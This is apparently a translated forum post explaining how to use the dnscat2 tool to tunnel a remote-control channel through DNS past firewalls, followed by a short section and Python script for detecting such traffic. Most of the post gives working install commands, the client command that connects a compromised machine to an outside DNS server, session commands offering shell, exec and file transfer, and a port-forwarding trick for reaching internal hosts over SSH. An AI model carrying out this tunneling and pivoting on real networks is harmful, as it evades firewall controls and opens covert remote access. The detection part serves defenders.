It often happens that a firewall blocks almost everything, yet name resolution is almost always allowed to pass as normal traffic. You can see an example scheme below.
Installing the dependencies and fetching dnscat2:
sudo apt-get update && sudo apt-get -y install ruby-dev git make g++ && sudo gem install bundler && git clone https://github.com/iagox86/dnscat2.git
Installing the server part:
cd dnscat2/server && bundle install
Installation of client part:
cd dnscat2/client && make
Some common errors are described here. If you hit an error that is not covered, write in this thread or search for it.
Client: run on the remote machine.
sudo ruby dnscat2.rb legitdnsserver.com
When the client connects, dnscat2 prints the session number. Attach to that session with:
sessions -i <session number>
The commands available inside a session are: clear, delay, download, echo, exec, help, listen, ping, quit, set, shell, shutdown, suspend, tunnels, unset, upload, window, windows.
The listen command is a very useful thing if you need convenient SSH access to machines on the local network.
We select the session and enter the command:
listen <port> <dest ip>:<ssh port>
Now you can easily connect over SSH to a machine that is not visible from outside. The listener is opened on the dnscat2 server side, so you connect to localhost:
ssh -p <port> <user>@localhost
By the way, dnscat2 encrypts its traffic by default. The author says this does not guarantee full cryptographic strength, but there is some protection.
How to detect dnscat2 on a machine.
Wireshark display filter:
dns.qry.name.len > 16 and !mdns
16 is just the length of the DNS domain name. I picked it manually; you may have a different number. To find it, just look at the filter result.
There may still be normal DNS queries left after this filter; in the packet details, look for dnscat.
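As an added example (not from the original post), here is the same two-step check written in Python over a constructed DNS query log: drop mDNS names, keep names longer than the threshold, then flag a leading dnscat label or the long all-hex labels dnscat2 uses to carry its data. The log format and the domain legitdnsserver.com are assumptions.

```python
import re

# Constructed sample DNS query log (not from the original post).
# Format per line: "time client qname qtype".
SAMPLE_LOG = """\
12:00:01 10.0.0.5 www.example.com A
12:00:02 10.0.0.5 3d9a1f0b2c.7e4b11aa00.legitdnsserver.com TXT
12:00:03 10.0.0.7 printer._ipp._tcp.local PTR
12:00:04 10.0.0.5 dnscat.a1b2c3d4e5f60718.0a0b0c0d.legitdnsserver.com CNAME
12:00:05 10.0.0.9 mail.corp.example.com MX
12:00:06 10.0.0.5 0f1e2d3c4b5a6978.legitdnsserver.com MX
"""

HEX_LABEL = re.compile(r"^[0-9a-f]{8,}$")  # a label made only of hex digits

def is_mdns(qname):
    # The "!mdns" part of the Wireshark filter: drop multicast-DNS names (.local).
    return qname.rstrip(".").lower().endswith(".local")

def classify(qname, min_len=16):
    """Return why a query name looks like dnscat2 traffic, or None if it does not."""
    if is_mdns(qname) or len(qname) <= min_len:
        return None  # same as "dns.qry.name.len > 16 and !mdns"
    labels = qname.rstrip(".").lower().split(".")
    if labels[0] == "dnscat":
        return "dnscat prefix"  # what the post tells you to look for
    # dnscat2 hex-encodes its packets into the subdomain labels, so long
    # all-hex labels in front of the tunnel domain are the second tell.
    hex_labels = [label for label in labels if HEX_LABEL.match(label)]
    if hex_labels:
        return "%d hex-encoded label(s)" % len(hex_labels)
    return None

def suspicious_queries(log_text, min_len=16):
    """Apply the filter to a whole log; returns (client, qname, qtype, reason) tuples."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # skip malformed lines
        _time, client, qname, qtype = parts[:4]
        reason = classify(qname, min_len)
        if reason:
            hits.append((client, qname, qtype, reason))
    return hits

if __name__ == "__main__":
    for client, qname, qtype, reason in suspicious_queries(SAMPLE_LOG):
        print(client, qtype, qname, "->", reason)
```

Raise min_len the same way the post suggests for the Wireshark filter until ordinary names from your own zone stop showing up.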
P.S. I may have gone beyond the “Software” section at some points, but it was necessary to show the functionality. Thank you all for your attention.